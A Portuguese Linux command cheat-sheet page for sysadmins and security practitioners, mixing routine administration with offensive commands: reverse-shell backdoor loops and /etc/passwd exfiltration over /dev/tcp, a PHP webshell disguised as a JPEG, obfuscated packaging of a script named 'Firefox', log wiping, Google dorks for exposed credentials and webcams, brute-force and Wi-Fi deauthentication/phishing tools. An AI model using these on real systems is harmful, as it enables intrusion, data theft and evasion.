Este site foi criado para facilitar a busca por comandos e dicas essenciais de Linux, especialmente voltados para profissionais de segurança cibernética e administradores de servidores. Aqui você encontrará uma coleção de comandos úteis, scripts e boas práticas para otimizar seu fluxo de trabalho e garantir a segurança dos seus sistemas.
Os comandos e scripts fornecidos aqui são exemplos gerais. Sempre adapte-os ao ambiente específico da sua organização e teste-os antes de usar em produção.
The Hacker News - https://thehackernews.com
Crowdstrike Blog - https://www.crowdstrike.com/en-us/blog/
Dark Reading - https://www.darkreading.com/threat-intelligence
InfoSec Magazine - https://www.infosecurity-magazine.com/threat-intelligence/
APT Groups - https://apt.etda.or.th/cgi-bin/aptgroups.cgi
Malpedia - https://malpedia.caad.fkie.fraunhofer.de/
Consultar comandos - https://explainshell.com/
Remover KeySensitive - echo set completion-ignore-case on | sudo tee -a /etc/inputrc
Habilitar autocompletar comandos (bash-completion) - sudo apt install bash-completion
Alterar hostname - sudo hostnamectl set-hostname [novo-hostname]
Uso de disco - df -h
Uso de memória - free -m
Uso de CPU - top
Verificar processos - ps axjf
Verificar versão do Kernel - uname -a
Verificar versão do SO - cat /etc/*-release
Listar comandos disponiveis - apropos ''
Listar todos os comandos disponíveis - compgen -c
Listar todos os aliases disponíveis - compgen -a
Listar "arquivos" abertos - lsof
Rastrear Chamadas do Sistema - strace
Rastrear Chamadas de Bibliotecas - ltrace
Listar dispositivos USB por ID - ls -l /dev/disk/by-id/
Informações detalhadas de USB - sudo lsusb -v -s 001:005
Informações detalhadas por Blocos - udevadm info --query=all --name=/dev/sda | grep SERIAL
Have I Been Pwned - Verifica se seus dados foram comprometidos em vazamentos.
URLQuery - Análise de URLs.
URLScan - Escaneamento de URLs.
VirusTotal - Análise de arquivos e URLs.
URLVoid - Verificação de reputação de URLs.
Sucuri SiteCheck - Verificação de segurança de sites.
Adicionar usuário com restrições:
sudo useradd --badname -m -s /bin/rbash usuario
sudo passwd usuario
Para alterar o SHELL:
sudo usermod --shell /bin/bash usuario
Criar usuário sem Home
sudo adduser --system --no-create-home --group nome_do_usuario
Remover restrição do PIP INSTALL - sudo rm /usr/lib/python3.11/EXTERNALLY-MANAGED
Alterar layout do teclado para US:
setxkbmap us
Alterar layout do teclado para BR:
setxkbmap br
Verificar layout atual do teclado:
setxkbmap -query
Definir layout persistente (adicionar ao arquivo .bashrc):
echo "setxkbmap us" >> ~/.bashrc
mkdir novo_projeto && cd novo_projeto
Python2.7 - python2.7 -m virtualenv venv
Python3.x - python3 -m venv venv
Habilitar o Env - source venv/bin/activate
Desabilitar o Env - deactivate
Instalar Libs - pip install -r requirements.txt
Exportar Libs - pip freeze > requirements.txt
BKP de diretório - sudo tar -cvpzf /caminho/para/backup_home.tar.gz -C /home
Restaurar BKP - sudo tar -cvpzf /caminho/para/backup_home.tar.gz -C /home/seu_usuario
Verificar Interfaces/IPs - ip -br a
"Subir" interface de rede - sudo ip link set eth0 up
"Derrubar" interface de rede - sudo ip link set eth0 down
Renomear interface de rede - sudo ip link set eth0 name eth1
Verificar endereço IP da interface - ip addr show eth0
Configurar endereço IP estático - sudo ip addr add 192.168.1.100/24 dev eth0
Remover endereço IP - sudo ip addr del 192.168.1.100/24 dev eth0
Adicionar rota padrão - sudo ip route add default via 192.168.1.1
Verificar tabela de roteamento - ip route show
Testar conectividade (ping) - ping google.com
Liberar e renovar IP (DHCP) - sudo dhclient -r eth0 && sudo dhclient eth0
Verificar status da interface - ip link show eth0
Habilitar/Desabilitar IPv6 - sudo sysctl -w net.ipv6.conf.eth0.disable_ipv6=1
Verificar tráfego de rede - sudo iftop -i eth0
Configurar DNS temporário - sudo echo "nameserver 8.8.8.8" > /etc/resolv.conf
Verificar resolução DNS - nslookup google.com
Verificar velocidade da interface - ethtool eth0
Configurar MTU da interface - sudo ip link set eth0 mtu 1500
Monitorar tráfego de rede em tempo real - sudo tcpdump -i eth0
Observar conexões ativas - ss -tulnp
Verificar conexões de rede (Origem e Destino) - netstat -nputw
Descoberta de Rede (ARP) - sudo netdiscover
PingSweep - (for ip in 192.168.1.{1..254}; do (ping -c 1 -W 1 $ip > /dev/null 2>&1 && echo "$ip está ativo") & done; wait) 2>/dev/null
PortScanner - (for port in {1..65535}; do (echo > /dev/tcp/ Verificar Tabela Arp - - cat /proc/net/arp
GRUB:
grub> set root=(hd0,1) <<- sintaxe da versão Grub2
grub> linux /boot/vmlinuz-xxxx root=/dev/sda1 ro quiet
grub> initrd /boot/initrd.img
grub> boot
CFG:
sudo nano /etc/default/grub
Manual em: www.gnu.org/software/grub
Listar Serviços - sudo systemctl list-unit-files
Habilitar Serviço - sudo systemctl enable (nome do serviço)
Desabilitar Serviço - sudo systemctl disable (nome do serviço)
Status do Serviço - sudo systemctl status (nome do serviço)
Iniciar Serviço - sudo systemctl start (nome do serviço)
Parar Serviço - sudo systemctl stop (nome do serviço)
Reiniciar Serviço - sudo systemctl restart (nome do serviço)
Recarregar Serviços - sudo systemctl daemon-reload
Diretórios comuns dos Serviços - /lib, /etc e /run : /systemd/system/
Redirecionar saída para destino específico:
sudo iptables -t nat -A OUTPUT -o tun0 -j DNAT --to-destination 10.13.5.224
Alterar a interface de uma zona:
firewall-cmd --zone={selected_zone} --change-interface={seleciona_interface} --permanent
Adicionar interfaces a uma zona:
firewall-cmd --zone={selected_zone} --permanent --add-interface={seleciona_interface}
Remover interfaces de uma zona:
firewall-cmd --zone={selected_zone} --permanent --remove-interface={interface_to_remove}
Adicionar serviços a uma zona:
firewall-cmd --add-service={service_choice} --permanent --zone={selected_zone}
Remover serviços de uma zona:
firewall-cmd --remove-service={service_choice} --permanent --zone={selected_zone}
Adicionar portas a uma zona:
firewall-cmd --add-port={port}/tcp --permanent --zone={selected_zone}
firewall-cmd --add-port={port}/udp --permanent --zone={selected_zone}
Remover portas de uma zona:
firewall-cmd --remove-port={port}/tcp --permanent --zone={selected_zone}
firewall-cmd --remove-port={port}/udp --permanent --zone={selected_zone}
Bloquear IP:
firewall-cmd --permanent --zone={selected_zone} --add-rich-rule='rule family=ipv4 source address={blocked_ip} drop'
Bloquear range de IP por máscara (não testado):
firewall-cmd --permanent --zone={selected_zone} --add-rich-rule='rule family=ipv4 source address={ip_mask} drop'
Alterar o target:
firewall-cmd --zone=selected_zone --set-target=sit-target
Aplicar configurações:
firewall-cmd --reload
Adicionar redirecionamento de porta:
firewall-cmd --add-forward-port=port=80:proto=tcp:toport=3000
firewall-cmd --runtime-to-permanent
Remover redirecionamento de porta:
firewall-cmd --remove-forward-port=port=80:proto=tcp:toport=3000:toaddr=
firewall-cmd --runtime-to-permanent
Com WGET (SinglePage) - wget --mirror --convert-links --adjust-extension --page-requisites https://URL
Com WGET (FullPage) - wget -e robots=off -mpEk --span-hosts --no-parent --domains bootstrapmade.com https://URL
Com CURL - curl -O https://URL
Com /dev/tcp - exec 3<> /dev/tcp/IP_REMOTO/PORTA ;echo -e "GET / HTTP/1.1\r\nHost: IP_REMOTO\r\nConnection: close\r\n\r\n" >&3; cat <&3> NOME_ARQUIVO
Fuzzing diretórios:
ffuf -u http://target.com/FUZZ -w wordlist.txt
Fuzzing subdomínios:
ffuf -u https://FUZZ.victim.com -w wordlist.txt
Fuzzing arquivos PHP:
ffuf -u http://HOST/FUZZ -w WORDLIST -e php -ic
Fuzzing parâmetros PHP:
ffuf -u 'http://HOST/index.php?FUZZ=/etc/hosts' -w WORDLIST
Filtrar por tamanho de resposta (remover 361 bytes):
... --fs 361 ...
Hydra - Ataque de força bruta em SSH:
hydra -l usuario -P /caminho/para/wordlist.txt ssh://IP_ALVO
Hydra - Ataque de força bruta em HTTP:
hydra -l usuario -P /caminho/para/wordlist.txt IP_ALVO http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
Medusa - Ataque de força bruta em FTP:
medusa -h IP_ALVO -u usuario -P /caminho/para/wordlist.txt -M ftp
John The Ripper - Força bruta em hashes:
john --wordlist=/caminho/para/wordlist.txt hash.txt
Hashcat - Força bruta em hashes:
hashcat -m 0 -a 0 hash.txt /caminho/para/wordlist.txt
WFuzz - Força bruta em parâmetros de URL:
wfuzz -c -z file,/caminho/para/wordlist.txt --hc 404 http://IP_ALVO/FUZZ
Ordenar arquivo em ordem crescente:
cat arquivo.txt | sort
Ordenar arquivo em ordem decrescente:
cat arquivo.txt | sort -r
Exibir arquivo em ordem crescente com números:
sort -n arquivo.txt
Exibir arquivo em ordem decrescente com números:
sort -nr arquivo.txt
Exibir conteúdo do arquivo:
cat arquivo.txt
Exibir conteúdo do arquivo em ordem inversa:
tac arquivo.txt
Shell Backdoor com While True:
while true; do exec 3<>/dev/tcp/127.0.0.1/4545; /bin/sh 0<&3 1>&3 2>&3; sleep 5; done
Shell Backdoor com While True:
exec 3<>/dev/tcp/192.168.0.10/4545; cat /etc/passwd >&3; exec 3<&-; exec 3>&-
IP Externo - curl ifconfig.me
Camuflar WebShellPHP em Imagem:
echo -e "\xFF\xD8\xFF\xE0" > image.php
echo -n '<?php $p = file_get_contents("/etc/natas_webpass/natas14"); echo $p; ?>' >> image.php
Verificar o arquivo
file image.php
Deve retornar o seguinte:
image.php: JPEG image data
Finding exposed directories:
intitle:"Index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml)
-inurl:(listen77|mp3raid|mp3toss|mp3drug|index_of|wallywashis)
Discovering open webcams:
inurl:"viewerframe?mode=motion"
Finding email lists:
filetype:txt @gmail.com OR @yahoo.com OR @hotmail.com OR @aol.com
Uncovering vulnerable web servers:
intitle:"Welcome to Windows 2000 Internet Services"
Discovering exposed CCTV cameras:
inurl:ViewerFrame?Mode=Motion
Finding SQL injection vulnerabilities:
inurl:index.php?id=
Uncovering sensitive information in files:
intitle:"Index of" password.txt
Discovering login pages:
inurl:admin/login
Finding exposed databases:
intext:"phpMyAdmin" "running on" inurl:"main.php"
Discovering vulnerable WordPress sites:
inurl:/wp-content/plugins/revslider/
Finding open FTP servers:
intitle:"index of" inurl:ftp
Discovering exposed configuration files:
intitle:"index of" config.yml
Finding open Git repositories:
intitle:index of .git
Discovering vulnerable Joomla installations:
inurl:/index.php?option=com_joomla
Finding sensitive files:
intitle:"index of" password OR passcode OR passphrase OR keyfile
Discovering exposed MongoDB instances:
intitle:"mongodb status" intext:"topologyVersion"
Finding open network devices:
intitle:"open network devices"
Discovering exposed subdomains:
site:\*.example.com -www
Finding vulnerable Apache Tomcat installations:
intitle:"Apache Tomcat" intext:"If you're seeing this, you've successfully installed Tomcat"
Discovering exposed GitLab repositories:
intitle:"GitLab"
Finding exposed server directories:
intitle:"index of" /admin
Discovering sensitive Google Drive files:
site:drive.google.com confidential
Finding exposed Jenkins instances:
intitle:"Dashboard [Jenkins]"
Discovering exposed AWS S3 buckets:
site:s3.amazonaws.com
Finding vulnerable Magento installations:
inurl:/index.php/admin
Discovering exposed log files:
intitle:"index of" error.log
Finding open Elasticsearch instances:
intitle:"Kibana" intext:"Welcome to Elastic"
Discovering exposed API keys:
filetype:env intext:API_KEY
Finding exposed phpMyAdmin installations:
inurl:"phpmyadmin/index.php"
Discovering vulnerable OpenCart installations:
inurl:/admin/config.php
Finding exposed sensitive documents:
filetype:pdf "Confidential"
Discovering exposed network devices:
intitle:"Device name" inurl:home.htm
Finding open RDP (Remote Desktop Protocol) servers:
intitle:"Remote Desktop Web Connection"
Discovering exposed Firebase databases:
intitle:"Firebase Console - Projects"
Finding vulnerable Drupal installations:
inurl:"/user/login" "Powered by Drupal"
LinPeas - curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
Listar containers em execução: docker ps
Listar todos containers (inclusive parados): docker ps -a
Iniciar container parado: docker start <container_id/nome>
Parar container rodando: docker stop <container_id/nome>
Reiniciar container: docker restart <container_id/nome>
Remover container: docker rm <container_id/nome>
Remover todos containers parados: docker container prune
Monitorar uso de recursos dos containers em tempo real: docker stats
Ver uso detalhado de disco pelo Docker: docker system df -v
Listar imagens locais: docker images ou docker image ls
Baixar imagem do Docker Hub: docker pull <imagem>:<tag>
Enviar imagem para o Docker Hub: docker push <imagem>:<tag>
Remover imagem específica: docker rmi <imagem>:<tag>
Remover todas imagens sem container associado: docker image prune
Remover todas imagens do host: docker rmi $(docker images -q)
Listar redes: docker network ls
Criar nova rede: docker network create <nome_rede>
Inspecionar rede: docker network inspect <nome_rede>
Remover rede: docker network rm <nome_rede>
Ver logs do container: docker logs <container_id/nome>
Executar comando dentro do container: docker exec -it <container_id/nome> /bin/bash
Build de imagem via Dockerfile: docker build -t <nome_imagem>:<tag> .
Parar todos os containers: docker stop $(docker ps -q)
Remover todos os containers: docker rm $(docker ps -aq)
Limpar tudo (containers, imagens, volumes e redes não usadas): docker system prune -a
Reverse Shell - https://www.revshells.com/
Substituir primeira ocorrência:
sed 's/old_word/new_word/' arquivo.txt
Substitui apenas a primeira ocorrência de old_word
por new_word
em cada linha.
Substituir todas ocorrências (global):
sed 's/old_word/new_word/g' arquivo.txt
Substitui todas as ocorrências de old_word
por new_word
em cada linha.
Substituir a n-ésima ocorrência:
sed 's/old_word/new_word/3' arquivo.txt
Altera apenas a terceira ocorrência de old_word
para new_word
em cada
linha.
Deletar linhas em branco:
sed '/^$/d' arquivo.txt
Remove todas as linhas vazias do arquivo.
Inserir texto antes da linha correspondente:
sed '/pattern/i\Texto a inserir' arquivo.txt
Insere “Texto a inserir” antes de cada linha que contenha pattern
.
Apender texto após a linha correspondente:
sed '/pattern/a\Texto a apendar' arquivo.txt
Apende “Texto a apendar” após cada linha que contenha pattern
.
Numeração simples de linhas:
sed = arquivo.txt | sed 'N;s/\n/\t/'
Numera cada linha, alinhando o número à esquerda com uma tabulação.
Mostrar apenas linhas de 5 a 10:
sed -n '5,10p' arquivo.txt
Imprime apenas as linhas de 5 a 10 do arquivo.
Edição in-place com backup:
sed -i.bak 's/old/new/g' arquivo.txt
Substitui globalmente old
por new
diretamente em arquivo.txt
,
salvando o original em arquivo.txt.bak
.
Usar expressões regulares estendidas:
sed -E 's/[[:space:]]+/ /g' arquivo.txt
Substitui múltiplos espaços em branco por um único espaço, usando regex estendida.
PyArmor - pyarmor -q gen gunkey.py
PyInstaller - pyinstaller -n Firefox -F gunkey.py
PyArmor with Obfuscation - pyarmor gen -O obfdist --pack dist/Firefox gunkey.py
Buscar arquivos por nome:
find / -name "nome_do_arquivo" 2>/dev/null
Buscar arquivos por extensão:
find / -type f -name "*.extensao" 2>/dev/null
Buscar arquivos maiores que 100MB:
find / -type f -size +100M 2>/dev/null
Buscar arquivos modificados nos últimos 7 dias:
find / -type f -mtime -7 2>/dev/null
Buscar arquivos acessados nos últimos 24 horas:
find / -type f -atime -1 2>/dev/null
Buscar arquivos contendo "arquivo":
grep -r --exclude-dir={proc,sys} "arquivo" / 2>/dev/null
Buscar arquivos contendo "arquivo" em todos os arquivos:
find / -type f -exec grep -H "arquivo" {} \; 2>/dev/null
Buscar arquivos contendo "arquivo" em arquivos .txt:
grep -r --include="*.txt" "arquivo" / 2>/dev/null
Buscar arquivos com permissão de escrita (writable):
find / -type f -writable 2>/dev/null
find / -type f \( -name usuario1 -o -name usuario2 \) -exec ls -ladb {} \; 2>/dev/null
find / -name root.txt -exec ls -lda {} \; 2>/dev/null
find / -user root -perm -4000 -exec ls -ladb {} \; 2>/dev/null
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null
find / -type f -perm -u=s -user des -ls 2>/dev/null
find / -type f -name "*.bak" 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
O arquivo crontab tem cinco campos de tempo seguidos pelo comando a ser executado:
┌──────── min (0 - 59) │ ┌───────── hora (0 - 23) │ │ ┌────────── dia do mês (1 - 31) │ │ │ ┌─────────── mês (1 - 12) │ │ │ │ ┌──────────── dia da semana (0 - 6) │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ * * * * * comando a ser executado
Agendar uma tarefa para ser executada a cada minuto:
echo "*/1 * * * * /usr/bin/python3 /home/kali/Documentos/gun.py" | crontab -
reRun JOHN > delete 'john.pot'
unshadow passwd shcat adow > passwords.txt
john --show
Imprimir número da linha e conteúdo - awk '{print NR,$0}' file.txt
Imprimir primeira e terceira coluna - awk '{print $1, $3}' file.txt
Usar cat e awk para imprimir primeira e terceira coluna - cat logfile | awk '{print $1, $3}'
Substituir 'espaço' por ':' - awk 'BEGIN{FS=" "; OFS=":"} {print $1,$4}' awk.txt
Coluna em linhas separado por vírgula - awk 'BEGIN{ORS=", "}{print $1}' awk.txt
Formatar disco para ext4:
sudo mkfs.ext4 /dev/sdX
Shred disco:
sudo shred -n 1 -v /dev/sdX
Script para limpar logs:
#! /bin/sh cd /var/log for l in `ls -p|grep '/'`; do echo -n >$l &>/dev/null echo Zerando arquivo $l... done echo Limpeza de log concluída!
Verificar se o novo disco esta disponivél
lsblk
fdisk -l
Criar um Physical Volume (PV)
sudo pvcreate /dev/sdb
sudo pvdisplay
Identifique o VG que seu LVM está usando:
sudo vgdisplay
Suponha que seu VG se chame vg_root. Agora, adicione o novo PV ao VG:
sudo vgextend vg_root /dev/sdb
Confirme se o disco foi adicionado:
sudo vgdisplay
Liste os LVs disponíveis:
sudo lvdisplay
Identifique o LV que deseja expandir (exemplo: /dev/vg_root/lv_root) e aumente o tamanho dele:
sudo lvextend -l +100%FREE /dev/vg_root/lv_root
Se o sistema de arquivos for ext4, use:
sudo resize2fs /dev/vg_root/lv_root
Se for XFS, use:
sudo xfs_growfs /dev/vg_root/lv_root
Verifique se o espaço foi expandido:
df -h
Expandir Logical Volume:
sudo lvextend -l +100%FREE /dev/mapper/ubuntu--vg-ubuntu--lv
Redimensionar Sistema de Arquivos:
sudo resize2fs /dev/mapper/ubuntu--vg-ubuntu--lv
Verificar Espaço Disponível:
df -h /
Instalar Proxychains:
sudo apt install proxychains
Instalar Tor:
sudo apt install tor
Iniciar serviço Tor:
sudo service tor start
Editar configuração do Proxychains:
sudo nano /etc/proxychains.conf
Adicionar as seguintes linhas:
dynamic_chain proxy_dns tcp_read_time_out 15000 tcp_connect_time_out 8000 [ProxyList] # Usando o Tor como proxy socks4 127.0.0.1 9050
Testar conexão com Tor:
curl --socks5 127.0.0.1:9050 https://check.torproject.org
hcxdumptool -o dump.pcapng -i wlan0 --enable_status=1
hcxpcaptool -z test.16800 test.pcapng
hashcat -m 16800 test.16800 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule -a 0
hashcat -m 16800 test.16800 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule -a 0 -w 3
sudo airmon-ng wlan0 <channel>
Alterar canal da interface:
sudo iw dev wlp4s0mon set channel 10
Desativar processos que interferem no monitoramento:
sudo airmon-ng check kill
Enviar pacotes de desautenticação:
sudo aireplay-ng --deauth 0 -a 72:D9:AE:BC:CD:6C -c FF:FF:FF:FF:FF:FF wlp4s0mon
Capturar pacotes e salvar em arquivo:
sudo airodump-ng -x wlxd03745fbcadc --write dump
Quebrar senha usando wordlist:
sudo aircrack-ng -w wordlist dump-01.cap
bettercap -T 192.168.0.100 --interface at0 --no-spoofing --no-discovery --proxy --proxy-port 80 --proxy-https --proxy-https-port 443 -P POST
sudo wifiphisher -nD -i wlan0
sudo wifite --bully --kill
Exibir uso de disco por diretório (ordenado):
sudo du -h --max-depth=1 / | sort -rh
cewl -d 2 -m 5 -w passwords.txt http://10.10.145.228 --with-numbers
cewl -d 0 -m 5 -w usernames.txt http://MACHINE_IP/team.php --lowercase
crunch 3 3 0123456789ABCDEF -o 3digits.txt
crunch 3 3 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -o 3digits.txt
cewl http://192.168.56.3/sec.html -w sec.txt -m 5 -d 8
Instalar CUPP:
sudo apt install cupp
cupp -i
Combinar wordlists:
cupp -w
Crie o arquivo de serviço:
sudo nano /etc/systemd/system/macchanger.service [Unit] Description=Change MAC address After=network.target [Service] Type=oneshot ExecStart=/usr/sbin/ip link set [interface] down ExecStart=/usr/bin/macchanger -r [interface] ExecStart=/usr/sbin/ip link set [interface] up RemainAfterExit=yes [Install] WantedBy=multi-user.target
Recarregue os daemons do systemd:
sudo systemctl daemon-reload
Habilite e inicie o serviço:
sudo systemctl enable macchanger.service
sudo systemctl start macchanger.service
Verifique o status do serviço:
sudo systemctl status macchanger.service
Verifique o endereço MAC:
macchanger -s [interface]
Desmontar binário com objdump: objdump -d [binario]
Inspecionar strings em um binário: strings binario
Descompilar binário com Ghidra: ghidra binario
Descompilar binário com Radare2: r2 -A binario
Debug com GDB: gdb binario
Carregar binário no Hopper: hopper binario
Verificar dependências de um binário: ldd binario
Monitorar chamadas de sistema: strace ./binario
Exibir conteúdo hexadecimal de um arquivo: hexdump -C arquivo
Exibir informações detalhadas de um arquivo: stat arquivo
Inspecionar cabeçalhos ELF de um binário: readelf -h binario
Listar fusos horários disponíveis:
timedatectl list-timezones | grep America/[Regiao]
Definir fuso horário:
sudo timedatectl set-timezone America/Sao_Paulo